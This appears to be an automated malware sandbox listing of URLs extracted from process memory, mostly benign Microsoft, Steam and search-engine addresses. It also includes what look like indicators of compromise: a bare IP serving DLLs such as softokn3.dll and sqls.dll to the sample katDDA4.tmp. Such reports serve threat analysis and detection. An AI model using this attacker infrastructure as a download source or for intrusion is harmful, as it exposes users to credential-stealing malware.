Source: katDDA4.tmp, 0000000C.00000003.2369519792.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/softokn3.dll
Source: katDDA4.tmp, 0000000C.00000003.2398637104.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/softokn3.dll0:
Source: katDDA4.tmp, 0000000C.00000003.2398637104.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/softokn3.dllX:/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/sqls.dll
Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/vcruntime140.dll
Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/vcruntime140.dlly
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12BFBKFB
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12KEBFIE
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSA4
Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSd
Source: explorer.exe, 00000002.00000000.1401695324.000000000702D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: 76561199689717899[1].htm.12.dr	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
Source: 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v
Source: katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
